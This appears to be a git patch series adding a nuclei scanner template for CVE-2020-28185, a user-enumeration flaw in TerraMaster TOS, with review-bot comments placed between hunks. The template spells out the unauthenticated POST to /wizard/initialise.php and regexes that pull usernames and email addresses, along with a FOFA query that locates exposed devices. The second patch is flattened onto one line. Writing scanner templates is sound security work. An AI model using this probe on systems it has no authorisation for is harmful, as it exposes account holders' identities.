From ec72aec7f628027a1336ebb02c96d8942aa9bef3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 8 Aug 2023 15:05:46 +0530
Subject: [PATCH 1/2] TerraMaster TOS - User Enumeration
---
http/cves/2020/CVE-2020-28185.yaml | 56 ++++++++++++++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 http/cves/2020/CVE-2020-28185.yaml
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
new file mode 100644
index 0000000000..305c9a9c91
--- /dev/null
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -0,0 +1,56 @@
+id: CVE-2020-28185
+
+info:
+ name: TerraMaster TOS < 4.2.06 - User Enumeration
+ author: pussycat0x
+ severity: medium
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: '"TerraMaster" && header="TOS"'
+ tags: tamronos,enum
+
+http:
+ - raw:
+ - |
+ GET /tos/index.php?user/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+
+ - |
+ POST /wizard/initialise.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Referer: {{BaseURL}}/tos/index.php?user/login
+
+ tab=checkuser&username=admin
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "username"
+ - "email"
+ - "status"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body_2
+ regex:
+ - '"username":"(.*?)"'
+ - '"email":"(.*?)"'
\ No newline at end of file
From d836e594adac616198aaae9f45abff792f45b490 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 9 Aug 2023 13:08:58 +0530
Subject: [PATCH 2/2] fix template
---
http/cves/2020/CVE-2020-28185.yaml | 13 ++++++-------
1 file changed, 6 insertions(+), 7 deletions(-)
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index 305c9a9c91..fa96180314 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
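Review bot: `max-request: 1` under `metadata` does not match the request block, which sends two raw requests (the GET to `/tos/index.php?user/login` and the POST to `/wizard/initialise.php`), so the value should be `max-request: 2`. The word matcher also inspects `part: body` while the extractor inspects `part: body_2`; with two requests and no `req-condition: true`, nuclei evaluates the matcher against each response on its own, if I read its semantics right, and the generic words `username`, `email` and `status` could be satisfied by the login page returned by the first request rather than by the JSON answer to the second, which is what the extractor reads. Setting `req-condition: true` on the request block and `part: body_2` on the word matcher ties matcher and extractor to the same response and removes that false-positive path. The `fix template` hunks further down the page touch this file again but leave `max-request: 1` and `part: body` as they are.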
@@ -4,24 +4,23 @@ info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ metadata: max-request: 1 verified: true fofa-query: '"TerraMaster" && header="TOS"' - tags: tamronos,enum + tags: cve,cve2020,tamronos,enum,tos http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - | POST /wizard/initialise.php HTTP/1.1 @@ -29,7 +28,7 @@ http: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - Referer: {{BaseURL}}/tos/index.php?user/login + Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin @@ -53,4 +52,4 @@ http: part: body_2 regex: - '"username":"(.*?)"' - - '"email":"(.*?)"' \ No newline at end of file + - '"email":"(.*?)"'
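Review bot: The added `description` states `TerraMaster TOS <= 4.2.06` while the unchanged `name` context line at the top of the hunk still reads `TerraMaster TOS < 4.2.06`, so the template now gives two different affected-version bounds. The description text follows the NVD wording for CVE-2020-28185, so the name is probably the one to align, to `name: TerraMaster TOS <= 4.2.06 - User Enumeration`, but whichever bound is correct should appear in both places. The same hunk strips the browser headers from the first GET yet the second hunk keeps `Accept-Encoding: gzip, deflate` on the POST, which is harmless but inconsistent with the minimal-request style the cleanup otherwise adopts.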